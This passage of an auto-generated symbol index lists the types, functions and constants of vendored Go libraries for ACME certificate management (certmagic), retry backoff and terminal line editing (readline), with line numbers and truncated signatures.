LetsEncryptProductionCA (line 529) | LetsEncryptProductionCA = "https://acme-v02.api.letsencrypt.org/directory" constant ZeroSSLProductionCA (line 530) | ZeroSSLProductionCA = "https://acme.zerossl.com/v2/DV90" constant prefixACME (line 534) | prefixACME = "acme" FILE: vendor/github.com/caddyserver/certmagic/async.go type jobManager (line 16) | type jobManager struct method Submit (line 34) | func (jm *jobManager) Submit(logger *zap.Logger, name string, job func... method worker (line 54) | func (jm *jobManager) worker() { type namedJob (line 24) | type namedJob struct function doWithRetry (line 84) | func doWithRetry(ctx context.Context, log *zap.Logger, f func(context.Co... type ErrNoRetry (line 139) | type ErrNoRetry struct method Unwrap (line 142) | func (e ErrNoRetry) Unwrap() error { return e.Err } method Error (line 143) | func (e ErrNoRetry) Error() string { return e.Err.Error() } type retryStateCtxKey (line 145) | type retryStateCtxKey struct constant maxRetryDuration (line 195) | maxRetryDuration = 24 * time.Hour * 30 FILE: vendor/github.com/caddyserver/certmagic/cache.go type Cache (line 49) | type Cache struct method SetOptions (line 132) | func (certCache *Cache) SetOptions(opts CacheOptions) { method Stop (line 142) | func (certCache *Cache) Stop() { method cacheCertificate (line 195) | func (certCache *Cache) cacheCertificate(cert Certificate) { method unsyncedCacheCertificate (line 207) | func (certCache *Cache) unsyncedCacheCertificate(cert Certificate) { method removeCertificate (line 286) | func (certCache *Cache) removeCertificate(cert Certificate) { method replaceCertificate (line 322) | func (certCache *Cache) replaceCertificate(oldCert, newCert Certificat... method getAllMatchingCerts (line 334) | func (certCache *Cache) getAllMatchingCerts(subject string) []Certific... method getAllCerts (line 348) | func (certCache *Cache) getAllCerts() []Certificate { method getConfig (line 358) | func (certCache *Cache) getConfig(cert Certificate) (*Config, error) { method AllMatchingCertificates (line 381) | func (certCache *Cache) AllMatchingCertificates(name string) []Certifi... method RemoveManaged (line 399) | func (certCache *Cache) RemoveManaged(subjects []string) { method Remove (line 415) | func (certCache *Cache) Remove(hashes []string) { function NewCache (line 94) | func NewCache(opts CacheOptions) *Cache { type CacheOptions (line 150) | type CacheOptions struct type ConfigGetter (line 190) | type ConfigGetter FILE: vendor/github.com/caddyserver/certmagic/certificates.go type Certificate (line 35) | type Certificate struct method Empty (line 63) | func (cert Certificate) Empty() bool { method Hash (line 68) | func (cert Certificate) Hash() string { return cert.hash } method NeedsRenewal (line 72) | func (cert Certificate) NeedsRenewal(cfg *Config) bool { method Expired (line 77) | func (cert Certificate) Expired() bool { method HasTag (line 106) | func (cert Certificate) HasTag(tag string) bool { function currentlyInRenewalWindow (line 92) | func currentlyInRenewalWindow(notBefore, notAfter time.Time, renewalWind... function expiresAt (line 118) | func expiresAt(cert *x509.Certificate) time.Time { method CacheManagedCertificate (line 132) | func (cfg *Config) CacheManagedCertificate(ctx context.Context, domain s... method loadManagedCertificate (line 145) | func (cfg *Config) loadManagedCertificate(ctx context.Context, domain st... method CacheUnmanagedCertificatePEMFile (line 164) | func (cfg *Config) CacheUnmanagedCertificatePEMFile(ctx context.Context,... method CacheUnmanagedTLSCertificate (line 182) | func (cfg *Config) CacheUnmanagedTLSCertificate(ctx context.Context, tls... method CacheUnmanagedCertificatePEMBytes (line 203) | func (cfg *Config) CacheUnmanagedCertificatePEMBytes(ctx context.Context... method makeCertificateFromDiskWithOCSP (line 218) | func (cfg Config) makeCertificateFromDiskWithOCSP(ctx context.Context, s... method makeCertificateWithOCSP (line 232) | func (cfg Config) makeCertificateWithOCSP(ctx context.Context, certPEMBl... function makeCertificate (line 249) | func makeCertificate(certPEMBlock, keyPEMBlock []byte) (Certificate, err... function fillCertFromLeaf (line 269) | func fillCertFromLeaf(cert *Certificate, tlsCert tls.Certificate) error { method managedCertInStorageExpiresSoon (line 331) | func (cfg *Config) managedCertInStorageExpiresSoon(ctx context.Context, ... method reloadManagedCertificate (line 345) | func (cfg *Config) reloadManagedCertificate(ctx context.Context, oldCert... function SubjectQualifiesForCert (line 361) | func SubjectQualifiesForCert(subj string) bool { function SubjectQualifiesForPublicCert (line 384) | func SubjectQualifiesForPublicCert(subj string) bool { function SubjectIsIP (line 404) | func SubjectIsIP(subj string) bool { function SubjectIsInternal (line 410) | func SubjectIsInternal(subj string) bool { function MatchWildcard (line 425) | func MatchWildcard(subject, wildcard string) bool { FILE: vendor/github.com/caddyserver/certmagic/certmagic.go function HTTPS (line 72) | func HTTPS(domainNames []string, mux http.Handler) error { function httpRedirectHandler (line 156) | func httpRedirectHandler(w http.ResponseWriter, r *http.Request) { function TLS (line 185) | func TLS(domainNames []string) (*tls.Config, error) { function Listen (line 202) | func Listen(domainNames []string) (net.Listener, error) { function ManageSync (line 234) | func ManageSync(ctx context.Context, domainNames []string) error { function ManageAsync (line 247) | func ManageAsync(ctx context.Context, domainNames []string) error { type OnDemandConfig (line 266) | type OnDemandConfig struct function isLoopback (line 308) | func isLoopback(addr string) bool { function isInternal (line 319) | func isInternal(addr string) bool { function hostOnly (line 343) | func hostOnly(hostport string) string { type PreChecker (line 355) | type PreChecker interface type Issuer (line 360) | type Issuer interface type Revoker (line 385) | type Revoker interface type Manager (line 394) | type Manager interface type KeyGenerator (line 402) | type KeyGenerator interface type IssuerPolicy (line 412) | type IssuerPolicy constant UseFirstIssuer (line 418) | UseFirstIssuer = "first" constant UseFirstRandomIssuer (line 423) | UseFirstRandomIssuer = "first_random" type IssuedCertificate (line 427) | type IssuedCertificate struct type CertificateResource (line 439) | type CertificateResource struct method NamesKey (line 463) | func (cr *CertificateResource) NamesKey() string { constant HTTPChallengePort (line 509) | HTTPChallengePort = 80 constant TLSALPNChallengePort (line 513) | TLSALPNChallengePort = 443 constant stackTraceBufferSize (line 539) | stackTraceBufferSize = 1024 * 128 FILE: vendor/github.com/caddyserver/certmagic/config.go type Config (line 46) | type Config struct method ManageSync (line 306) | func (cfg *Config) ManageSync(ctx context.Context, domainNames []strin... method ManageAsync (line 326) | func (cfg *Config) ManageAsync(ctx context.Context, domainNames []stri... method ClientCredentials (line 333) | func (cfg *Config) ClientCredentials(ctx context.Context, identifiers ... method manageAll (line 353) | func (cfg *Config) manageAll(ctx context.Context, domainNames []string... method manageOne (line 379) | func (cfg *Config) manageOne(ctx context.Context, domainName string, a... method ObtainCertSync (line 472) | func (cfg *Config) ObtainCertSync(ctx context.Context, name string) er... method ObtainCertAsync (line 478) | func (cfg *Config) ObtainCertAsync(ctx context.Context, name string) e... method obtainCert (line 482) | func (cfg *Config) obtainCert(ctx context.Context, name string, intera... method reusePrivateKey (line 661) | func (cfg *Config) reusePrivateKey(ctx context.Context, domain string)... method storageHasCertResourcesAnyIssuer (line 697) | func (cfg *Config) storageHasCertResourcesAnyIssuer(ctx context.Contex... method RenewCertSync (line 711) | func (cfg *Config) RenewCertSync(ctx context.Context, name string, for... method RenewCertAsync (line 717) | func (cfg *Config) RenewCertAsync(ctx context.Context, name string, fo... method renewCert (line 721) | func (cfg *Config) renewCert(ctx context.Context, name string, force, ... method generateCSR (line 900) | func (cfg *Config) generateCSR(privateKey crypto.PrivateKey, sans []st... method RevokeCert (line 938) | func (cfg *Config) RevokeCert(ctx context.Context, domain string, reas... method TLSConfig (line 992) | func (cfg *Config) TLSConfig() *tls.Config { method getChallengeInfo (line 1014) | func (cfg *Config) getChallengeInfo(ctx context.Context, identifier st... method checkStorage (line 1059) | func (cfg *Config) checkStorage(ctx context.Context) error { method storageHasCertResources (line 1099) | func (cfg *Config) storageHasCertResources(ctx context.Context, issuer... method deleteSiteAssets (line 1112) | func (cfg *Config) deleteSiteAssets(ctx context.Context, issuerKey, do... method lockKey (line 1134) | func (cfg *Config) lockKey(op, domainName string) string { method managedCertNeedsRenewal (line 1140) | func (cfg *Config) managedCertNeedsRenewal(certRes CertificateResource... method emit (line 1150) | func (cfg *Config) emit(ctx context.Context, eventName string, data ma... function NewDefault (line 169) | func NewDefault() *Config { function New (line 208) | func New(certCache *Cache, cfg Config) *Config { function newWithCache (line 224) | func newWithCache(certCache *Cache, cfg Config) *Config { type CertificateSelector (line 1158) | type CertificateSelector interface type OCSPConfig (line 1163) | type OCSPConfig struct constant certIssueLockOp (line 1182) | certIssueLockOp = "issue_cert" FILE: vendor/github.com/caddyserver/certmagic/crypto.go function PEMEncodePrivateKey (line 45) | func PEMEncodePrivateKey(key crypto.PrivateKey) ([]byte, error) { function PEMDecodePrivateKey (line 75) | func PEMDecodePrivateKey(keyPEMBytes []byte) (crypto.Signer, error) { function parseCertsFromPEMBundle (line 112) | func parseCertsFromPEMBundle(bundle []byte) ([]*x509.Certificate, error) { function fastHash (line 137) | func fastHash(input []byte) string { method saveCertResource (line 146) | func (cfg *Config) saveCertResource(ctx context.Context, issuer Issuer, ... method loadCertResourceAnyIssuer (line 177) | func (cfg *Config) loadCertResourceAnyIssuer(ctx context.Context, certNa... method loadCertResource (line 240) | func (cfg *Config) loadCertResource(ctx context.Context, issuer Issuer, ... function hashCertificateChain (line 273) | func hashCertificateChain(certChain [][]byte) string { function namesFromCSR (line 281) | func namesFromCSR(csr *x509.CertificateRequest) []string { function preferredDefaultCipherSuites (line 299) | func preferredDefaultCipherSuites() []uint16 { type StandardKeyGenerator (line 327) | type StandardKeyGenerator struct method GenerateKey (line 333) | func (kg StandardKeyGenerator) GenerateKey() (crypto.PrivateKey, error) { type KeyType (line 356) | type KeyType constant ED25519 (line 360) | ED25519 = KeyType("ed25519") constant P256 (line 361) | P256 = KeyType("p256") constant P384 (line 362) | P384 = KeyType("p384") constant RSA2048 (line 363) | RSA2048 = KeyType("rsa2048") constant RSA4096 (line 364) | RSA4096 = KeyType("rsa4096") constant RSA8192 (line 365) | RSA8192 = KeyType("rsa8192") FILE: vendor/github.com/caddyserver/certmagic/dnsutil.go function findZoneByFQDN (line 23) | func findZoneByFQDN(fqdn string, nameservers []string) (string, error) { function lookupSoaByFqdn (line 34) | func lookupSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry,... function fetchSoaByFqdn (line 65) | func fetchSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry, ... function dnsMsgContainsCNAME (line 111) | func dnsMsgContainsCNAME(msg *dns.Msg) bool { function dnsQuery (line 120) | func dnsQuery(fqdn string, rtype uint16, nameservers []string, recursive... function createDNSMsg (line 133) | func createDNSMsg(fqdn string, rtype uint16, recursive bool) *dns.Msg { function sendDNSQuery (line 145) | func sendDNSQuery(m *dns.Msg, ns string) (*dns.Msg, error) { function formatDNSError (line 159) | func formatDNSError(msg *dns.Msg, err error) string { type soaCacheEntry (line 174) | type soaCacheEntry struct method isExpired (line 189) | func (cache *soaCacheEntry) isExpired() bool { function newSoaCacheEntry (line 180) | func newSoaCacheEntry(soa *dns.SOA) *soaCacheEntry { function systemOrDefaultNameservers (line 195) | func systemOrDefaultNameservers(path string, defaults []string) []string { function populateNameserverPorts (line 204) | func populateNameserverPorts(servers []string) { function checkDNSPropagation (line 214) | func checkDNSPropagation(fqdn, value string, resolvers []string) (bool, ... function checkAuthoritativeNss (line 238) | func checkAuthoritativeNss(fqdn, value string, nameservers []string) (bo... function lookupNameservers (line 275) | func lookupNameservers(fqdn string, resolvers []string) ([]string, error) { function updateDomainWithCName (line 301) | func updateDomainWithCName(r *dns.Msg, fqdn string) string { function recursiveNameservers (line 316) | func recursiveNameservers(custom []string) []string { constant defaultResolvConf (line 342) | defaultResolvConf = "/etc/resolv.conf" FILE: vendor/github.com/caddyserver/certmagic/filestorage.go type FileStorage (line 68) | type FileStorage struct method Exists (line 73) | func (s *FileStorage) Exists(_ context.Context, key string) bool { method Store (line 79) | func (s *FileStorage) Store(_ context.Context, key string, value []byt... method Load (line 89) | func (s *FileStorage) Load(_ context.Context, key string) ([]byte, err... method Delete (line 94) | func (s *FileStorage) Delete(_ context.Context, key string) error { method List (line 99) | func (s *FileStorage) List(ctx context.Context, prefix string, recursi... method Stat (line 133) | func (s *FileStorage) Stat(_ context.Context, key string) (KeyInfo, er... method Filename (line 148) | func (s *FileStorage) Filename(key string) string { method Lock (line 154) | func (s *FileStorage) Lock(ctx context.Context, name string) error { method Unlock (line 241) | func (s *FileStorage) Unlock(_ context.Context, name string) error { method String (line 245) | func (s *FileStorage) String() string { method lockFilename (line 249) | func (s *FileStorage) lockFilename(name string) string { method lockDir (line 253) | func (s *FileStorage) lockDir() string { function fileLockIsStale (line 257) | func fileLockIsStale(meta lockMeta) bool { function createLockfile (line 271) | func createLockfile(filename string) error { function keepLockfileFresh (line 289) | func keepLockfileFresh(filename string) { function updateLockfileFreshness (line 314) | func updateLockfileFreshness(filename string) (bool, error) { function atomicallyCreateFile (line 359) | func atomicallyCreateFile(filename string, writeLockInfo bool) error { function homeDir (line 387) | func homeDir() string { function dataDir (line 403) | func dataDir() string { type lockMeta (line 412) | type lockMeta struct constant lockFreshnessInterval (line 422) | lockFreshnessInterval = 5 * time.Second constant fileLockPollInterval (line 426) | fileLockPollInterval = 1 * time.Second FILE: vendor/github.com/caddyserver/certmagic/handshake.go method GetCertificate (line 48) | func (cfg *Config) GetCertificate(clientHello *tls.ClientHelloInfo) (*tl... method GetCertificateWithContext (line 52) | func (cfg *Config) GetCertificateWithContext(ctx context.Context, client... method getCertificateFromCache (line 110) | func (cfg *Config) getCertificateFromCache(hello *tls.ClientHelloInfo) (... method selectCert (line 182) | func (cfg *Config) selectCert(hello *tls.ClientHelloInfo, name string) (... function DefaultCertificateSelector (line 230) | func DefaultCertificateSelector(hello *tls.ClientHelloInfo, choices []Ce... method getCertDuringHandshake (line 261) | func (cfg *Config) getCertDuringHandshake(ctx context.Context, hello *tl... method loadCertFromStorage (line 396) | func (cfg *Config) loadCertFromStorage(ctx context.Context, logger *zap.... method optionalMaintenance (line 425) | func (cfg *Config) optionalMaintenance(ctx context.Context, log *zap.Log... method checkIfCertShouldBeObtained (line 447) | func (cfg *Config) checkIfCertShouldBeObtained(ctx context.Context, name... method obtainOnDemandCertificate (line 475) | func (cfg *Config) obtainOnDemandCertificate(ctx context.Context, hello ... method handshakeMaintenance (line 549) | func (cfg *Config) handshakeMaintenance(ctx context.Context, hello *tls.... method renewDynamicCertificate (line 623) | func (cfg *Config) renewDynamicCertificate(ctx context.Context, hello *t... method getCertFromAnyCertManager (line 750) | func (cfg *Config) getCertFromAnyCertManager(ctx context.Context, hello ... method getTLSALPNChallengeCert (line 798) | func (cfg *Config) getTLSALPNChallengeCert(clientHello *tls.ClientHelloI... method getNameFromClientHello (line 825) | func (*Config) getNameFromClientHello(hello *tls.ClientHelloInfo) string { function logWithRemote (line 833) | func logWithRemote(l *zap.Logger, hello *tls.ClientHelloInfo) *zap.Logger { function localIPFromConn (line 848) | func localIPFromConn(c net.Conn) string { function normalizedName (line 869) | func normalizedName(serverName string) string { type serializableClientHello (line 885) | type serializableClientHello struct function clientHelloWithoutConn (line 901) | func clientHelloWithoutConn(hello *tls.ClientHelloInfo) serializableClie... type helloInfoCtxKey (line 924) | type helloInfoCtxKey constant ClientHelloInfoCtxKey (line 932) | ClientHelloInfoCtxKey helloInfoCtxKey = "certmagic:ClientHelloInfo" FILE: vendor/github.com/caddyserver/certmagic/httphandler.go method HTTPChallengeHandler (line 31) | func (am *ACMEIssuer) HTTPChallengeHandler(h http.Handler) http.Handler { method HandleHTTPChallenge (line 52) | func (am *ACMEIssuer) HandleHTTPChallenge(w http.ResponseWriter, r *http... method distributedHTTPChallengeSolver (line 69) | func (am *ACMEIssuer) distributedHTTPChallengeSolver(w http.ResponseWrit... function solveHTTPChallenge (line 90) | func solveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *ht... function SolveHTTPChallenge (line 112) | func SolveHTTPChallenge(logger *zap.Logger, w http.ResponseWriter, r *ht... function LooksLikeHTTPChallenge (line 118) | func LooksLikeHTTPChallenge(r *http.Request) bool { constant challengeBasePath (line 122) | challengeBasePath = "/.well-known/acme-challenge" FILE: vendor/github.com/caddyserver/certmagic/maintain.go method maintainAssets (line 43) | func (certCache *Cache) maintainAssets(panicCount int) { method RenewManagedCertificates (line 92) | func (certCache *Cache) RenewManagedCertificates(ctx context.Context) er... method queueRenewalTask (line 210) | func (certCache *Cache) queueRenewalTask(ctx context.Context, oldCert Ce... method updateOCSPStaples (line 260) | func (certCache *Cache) updateOCSPStaples(ctx context.Context) { type CleanStorageOptions (line 394) | type CleanStorageOptions struct function CleanStorage (line 416) | func CleanStorage(ctx context.Context, storage Storage, opts CleanStorag... type lastCleanPayload (line 498) | type lastCleanPayload type lastCleaned (line 500) | type lastCleaned struct function deleteOldOCSPStaples (line 505) | func deleteOldOCSPStaples(ctx context.Context, storage Storage, logger *... function deleteExpiredCerts (line 543) | func deleteExpiredCerts(ctx context.Context, storage Storage, logger *za... method forceRenew (line 631) | func (cfg *Config) forceRenew(ctx context.Context, logger *zap.Logger, c... method moveCompromisedPrivateKey (line 690) | func (cfg *Config) moveCompromisedPrivateKey(ctx context.Context, cert C... function certShouldBeForceRenewed (line 721) | func certShouldBeForceRenewed(cert Certificate) bool { constant DefaultRenewCheckInterval (line 733) | DefaultRenewCheckInterval = 10 * time.Minute constant DefaultRenewalWindowRatio (line 739) | DefaultRenewalWindowRatio = 1.0 / 3.0 constant DefaultOCSPCheckInterval (line 742) | DefaultOCSPCheckInterval = 1 * time.Hour FILE: vendor/github.com/caddyserver/certmagic/ocsp.go function stapleOCSP (line 47) | func stapleOCSP(ctx context.Context, ocspConfig OCSPConfig, storage Stor... function getOCSPForCert (line 142) | func getOCSPForCert(ocspConfig OCSPConfig, bundle []byte) ([]byte, *ocsp... function freshOCSP (line 227) | func freshOCSP(resp *ocsp.Response) bool { FILE: vendor/github.com/caddyserver/certmagic/ratelimiter.go function NewRateLimiter (line 31) | func NewRateLimiter(maxEvents int, window time.Duration) *RingBufferRate... type RingBufferRateLimiter (line 54) | type RingBufferRateLimiter struct method Stop (line 65) | func (r *RingBufferRateLimiter) Stop() { method loop (line 69) | func (r *RingBufferRateLimiter) loop() { method Allow (line 114) | func (r *RingBufferRateLimiter) Allow() bool { method Wait (line 125) | func (r *RingBufferRateLimiter) Wait(ctx context.Context) error { method MaxEvents (line 136) | func (r *RingBufferRateLimiter) MaxEvents() int { method SetMaxEvents (line 149) | func (r *RingBufferRateLimiter) SetMaxEvents(maxEvents int) { method Window (line 193) | func (r *RingBufferRateLimiter) Window() time.Duration { method SetWindow (line 203) | func (r *RingBufferRateLimiter) SetWindow(window time.Duration) { method permit (line 215) | func (r *RingBufferRateLimiter) permit() { method advance (line 239) | func (r *RingBufferRateLimiter) advance() { FILE: vendor/github.com/caddyserver/certmagic/solvers.go type httpSolver (line 48) | type httpSolver struct method Present (line 55) | func (s *httpSolver) Present(ctx context.Context, _ acme.Challenge) er... method serve (line 81) | func (s *httpSolver) serve(ctx context.Context, si *solverInfo) { method CleanUp (line 102) | func (s *httpSolver) CleanUp(_ context.Context, _ acme.Challenge) error { type tlsALPNSolver (line 122) | type tlsALPNSolver struct method Present (line 129) | func (s *tlsALPNSolver) Present(ctx context.Context, chal acme.Challen... method handleConn (line 200) | func (*tlsALPNSolver) handleConn(conn net.Conn) { method CleanUp (line 223) | func (s *tlsALPNSolver) CleanUp(_ context.Context, chal acme.Challenge... type DNS01Solver (line 252) | type DNS01Solver struct method Present (line 293) | func (s *DNS01Solver) Present(ctx context.Context, challenge acme.Chal... method Wait (line 333) | func (s *DNS01Solver) Wait(ctx context.Context, challenge acme.Challen... method CleanUp (line 393) | func (s *DNS01Solver) CleanUp(_ context.Context, challenge acme.Challe... method saveDNSPresentMemory (line 436) | func (s *DNS01Solver) saveDNSPresentMemory(mem dnsPresentMemory) { method getDNSPresentMemory (line 445) | func (s *DNS01Solver) getDNSPresentMemory(dnsName, keyAuth string) (dn... method deleteDNSPresentMemory (line 464) | func (s *DNS01Solver) deleteDNSPresentMemory(dnsName, keyAuth string) { constant defaultDNSPropagationTimeout (line 428) | defaultDNSPropagationTimeout = 2 * time.Minute type dnsPresentMemory (line 430) | type dnsPresentMemory struct type ACMEDNSProvider (line 481) | type ACMEDNSProvider interface type distributedSolver (line 507) | type distributedSolver struct method Present (line 526) | func (dhs distributedSolver) Present(ctx context.Context, chal acme.Ch... method Wait (line 545) | func (dhs distributedSolver) Wait(ctx context.Context, challenge acme.... method CleanUp (line 554) | func (dhs distributedSolver) CleanUp(ctx context.Context, chal acme.Ch... method challengeTokensPrefix (line 567) | func (dhs distributedSolver) challengeTokensPrefix() string { method challengeTokensKey (line 573) | func (dhs distributedSolver) challengeTokensKey(domain string) string { type solverInfo (line 579) | type solverInfo struct function getSolverInfo (line 587) | func getSolverInfo(address string) *solverInfo { function robustTryListen (line 608) | func robustTryListen(addr string) (net.Listener, error) { function dialTCPSocket (line 658) | func dialTCPSocket(addr string) error { function GetACMEChallenge (line 668) | func GetACMEChallenge(identifier string) (Challenge, bool) { type Challenge (line 699) | type Challenge struct function challengeKey (line 706) | func challengeKey(chal acme.Challenge) string { type solverWrapper (line 720) | type solverWrapper struct method Present (line 722) | func (sw solverWrapper) Present(ctx context.Context, chal acme.Challen... method Wait (line 729) | func (sw solverWrapper) Wait(ctx context.Context, chal acme.Challenge)... method CleanUp (line 736) | func (sw solverWrapper) CleanUp(ctx context.Context, chal acme.Challen... FILE: vendor/github.com/caddyserver/certmagic/storage.go type Storage (line 61) | type Storage interface type Locker (line 128) | type Locker interface type KeyInfo (line 159) | type KeyInfo struct function storeTx (line 167) | func storeTx(ctx context.Context, s Storage, all []keyValue) error { type keyValue (line 181) | type keyValue struct type KeyBuilder (line 189) | type KeyBuilder struct method CertsPrefix (line 193) | func (keys KeyBuilder) CertsPrefix(issuerKey string) string { method CertsSitePrefix (line 199) | func (keys KeyBuilder) CertsSitePrefix(issuerKey, domain string) string { method SiteCert (line 205) | func (keys KeyBuilder) SiteCert(issuerKey, domain string) string { method SitePrivateKey (line 213) | func (keys KeyBuilder) SitePrivateKey(issuerKey, domain string) string { method SiteMeta (line 221) | func (keys KeyBuilder) SiteMeta(issuerKey, domain string) string { method OCSPStaple (line 229) | func (keys KeyBuilder) OCSPStaple(cert *Certificate, pemBundle []byte)... method Safe (line 242) | func (keys KeyBuilder) Safe(str string) string { function CleanUpOwnLocks (line 266) | func CleanUpOwnLocks(ctx context.Context, logger *zap.Logger) { function acquireLock (line 281) | func acquireLock(ctx context.Context, storage Storage, lockKey string) e... function releaseLock (line 291) | func releaseLock(ctx context.Context, storage Storage, lockKey string) e... constant prefixCerts (line 315) | prefixCerts = "certificates" constant prefixOCSP (line 316) | prefixOCSP = "ocsp" FILE: vendor/github.com/cenkalti/backoff/v3/backoff.go type BackOff (line 16) | type BackOff interface constant Stop (line 36) | Stop time.Duration = -1 type ZeroBackOff (line 40) | type ZeroBackOff struct method Reset (line 42) | func (b *ZeroBackOff) Reset() {} method NextBackOff (line 44) | func (b *ZeroBackOff) NextBackOff() time.Duration { return 0 } type StopBackOff (line 48) | type StopBackOff struct method Reset (line 50) | func (b *StopBackOff) Reset() {} method NextBackOff (line 52) | func (b *StopBackOff) NextBackOff() time.Duration { return Stop } type ConstantBackOff (line 57) | type ConstantBackOff struct method Reset (line 61) | func (b *ConstantBackOff) Reset() {} method NextBackOff (line 62) | func (b *ConstantBackOff) NextBackOff() time.Duration { return b.Inter... function NewConstantBackOff (line 64) | func NewConstantBackOff(d time.Duration) *ConstantBackOff { FILE: vendor/github.com/cenkalti/backoff/v3/context.go type BackOffContext (line 10) | type BackOffContext interface type backOffContext (line 15) | type backOffContext struct method Context (line 48) | func (b *backOffContext) Context() context.Context { method NextBackOff (line 52) | func (b *backOffContext) NextBackOff() time.Duration { function WithContext (line 23) | func WithContext(b BackOff, ctx context.Context) BackOffContext { function ensureContext (line 41) | func ensureContext(b BackOff) BackOffContext { FILE: vendor/github.com/cenkalti/backoff/v3/exponential.go type ExponentialBackOff (line 54) | type ExponentialBackOff struct method Reset (line 106) | func (b *ExponentialBackOff) Reset() { method NextBackOff (line 113) | func (b *ExponentialBackOff) NextBackOff() time.Duration { method GetElapsedTime (line 128) | func (b *ExponentialBackOff) GetElapsedTime() time.Duration { method incrementCurrentInterval (line 133) | func (b *ExponentialBackOff) incrementCurrentInterval() { type Clock (line 69) | type Clock interface constant DefaultInitialInterval (line 75) | DefaultInitialInterval = 500 * time.Millisecond constant DefaultRandomizationFactor (line 76) | DefaultRandomizationFactor = 0.5 constant DefaultMultiplier (line 77) | DefaultMultiplier = 1.5 constant DefaultMaxInterval (line 78) | DefaultMaxInterval = 60 * time.Second constant DefaultMaxElapsedTime (line 79) | DefaultMaxElapsedTime = 15 * time.Minute function NewExponentialBackOff (line 83) | func NewExponentialBackOff() *ExponentialBackOff { type systemClock (line 96) | type systemClock struct method Now (line 98) | func (t systemClock) Now() time.Time { function getRandomValueFromInterval (line 144) | func getRandomValueFromInterval(randomizationFactor, random float64, cur... FILE: vendor/github.com/cenkalti/backoff/v3/retry.go type Operation (line 7) | type Operation type Notify (line 14) | type Notify function Retry (line 24) | func Retry(o Operation, b BackOff) error { return RetryNotify(o, b, nil) } function RetryNotify (line 28) | func RetryNotify(operation Operation, b BackOff, notify Notify) error { type PermanentError (line 69) | type PermanentError struct method Error (line 73) | func (e *PermanentError) Error() string { function Permanent (line 78) | func Permanent(err error) *PermanentError { FILE: vendor/github.com/cenkalti/backoff/v3/ticker.go type Ticker (line 12) | type Ticker struct method Stop (line 40) | func (t *Ticker) Stop() { method run (line 44) | func (t *Ticker) run() { method send (line 68) | func (t *Ticker) send(tick time.Time) <-chan time.Time { function NewTicker (line 26) | func NewTicker(b BackOff) *Ticker { FILE: vendor/github.com/cenkalti/backoff/v3/tries.go function WithMaxRetries (line 12) | func WithMaxRetries(b BackOff, max uint64) BackOff { type backOffTries (line 16) | type backOffTries struct method NextBackOff (line 22) | func (b *backOffTries) NextBackOff() time.Duration { method Reset (line 32) | func (b *backOffTries) Reset() { FILE: vendor/github.com/chzyer/readline/ansi_windows.go constant _ (line 16) | _ = uint16(0) constant COLOR_FBLUE (line 17) | COLOR_FBLUE = 0x0001 constant COLOR_FGREEN (line 18) | COLOR_FGREEN = 0x0002 constant COLOR_FRED (line 19) | COLOR_FRED = 0x0004 constant COLOR_FINTENSITY (line 20) | COLOR_FINTENSITY = 0x0008 constant COLOR_BBLUE (line 22) | COLOR_BBLUE = 0x0010 constant COLOR_BGREEN (line 23) | COLOR_BGREEN = 0x0020 constant COLOR_BRED (line 24) | COLOR_BRED = 0x0040 constant COLOR_BINTENSITY (line 25) | COLOR_BINTENSITY = 0x0080 constant COMMON_LVB_UNDERSCORE (line 27) | COMMON_LVB_UNDERSCORE = 0x8000 constant COMMON_LVB_BOLD (line 28) | COMMON_LVB_BOLD = 0x0007 type ANSIWriter (line 53) | type ANSIWriter struct method Close (line 68) | func (a *ANSIWriter) Close() error { method Write (line 196) | func (a *ANSIWriter) Write(b []byte) (int, error) { function NewANSIWriter (line 60) | func NewANSIWriter(w io.Writer) *ANSIWriter { type ANSIWriterCtx (line 73) | type ANSIWriterCtx struct method Flush (line 87) | func (a *ANSIWriterCtx) Flush() { method process (line 91) | func (a *ANSIWriterCtx) process(r rune) bool { method ioloopEscSeq (line 121) | func (a *ANSIWriterCtx) ioloopEscSeq(w *bufio.Writer, r rune, argptr *... function NewANSIWriterCtx (line 81) | func NewANSIWriterCtx(target io.Writer) *ANSIWriterCtx { function killLines (line 213) | func killLines() error { function eraseLine (line 235) | func eraseLine() error { FILE: vendor/github.com/chzyer/readline/complete.go type AutoCompleter (line 10) | type AutoCompleter interface type TabCompleter (line 21) | type TabCompleter struct method Do (line 23) | func (t *TabCompleter) Do([]rune, int) ([][]rune, int) { type opCompleter (line 27) | type opCompleter struct method doSelect (line 49) | func (o *opCompleter) doSelect() { method nextCandidate (line 59) | func (o *opCompleter) nextCandidate(i int) { method OnComplete (line 67) | func (o *opCompleter) OnComplete() bool { method IsInCompleteSelectMode (line 113) | func (o *opCompleter) IsInCompleteSelectMode() bool { method IsInCompleteMode (line 117) | func (o *opCompleter) IsInCompleteMode() bool { method HandleCompleteSelect (line 121) | func (o *opCompleter) HandleCompleteSelect(r rune) bool { method getMatrixSize (line 176) | func (o *opCompleter) getMatrixSize() int { method OnWidthChange (line 184) | func (o *opCompleter) OnWidthChange(newWidth int) { method CompleteRefresh (line 188) | func (o *opCompleter) CompleteRefresh() { method aggCandidate (line 244) | func (o *opCompleter) aggCandidate(candidate [][]rune) int { method EnterCompleteSelectMode (line 261) | func (o *opCompleter) EnterCompleteSelectMode() { method EnterCompleteMode (line 267) | func (o *opCompleter) EnterCompleteMode(offset int, candidate [][]rune) { method ExitCompleteSelectMode (line 274) | func (o *opCompleter) ExitCompleteSelectMode() { method ExitCompleteMode (line 282) | func (o *opCompleter) ExitCompleteMode(revent bool) { function newOpCompleter (line 41) | func newOpCompleter(w io.Writer, op *Operation, width int) *opCompleter { FILE: vendor/github.com/chzyer/readline/complete_helper.go type DynamicCompleteFunc (line 9) | type DynamicCompleteFunc type PrefixCompleterInterface (line 11) | type PrefixCompleterInterface interface type DynamicPrefixCompleterInterface (line 19) | type DynamicPrefixCompleterInterface interface type PrefixCompleter (line 25) | type PrefixCompleter struct method Tree (line 32) | func (p *PrefixCompleter) Tree(prefix string) string { method Print (line 54) | func (p *PrefixCompleter) Print(prefix string, level int, buf *bytes.B... method IsDynamic (line 58) | func (p *PrefixCompleter) IsDynamic() bool { method GetName (line 62) | func (p *PrefixCompleter) GetName() []rune { method GetDynamicNames (line 66) | func (p *PrefixCompleter) GetDynamicNames(line []rune) [][]rune { method GetChildren (line 74) | func (p *PrefixCompleter) GetChildren() []PrefixCompleterInterface { method SetChildren (line 78) | func (p *PrefixCompleter) SetChildren(children []PrefixCompleterInterf... method Do (line 103) | func (p *PrefixCompleter) Do(line []rune, pos int) (newLine [][]rune, 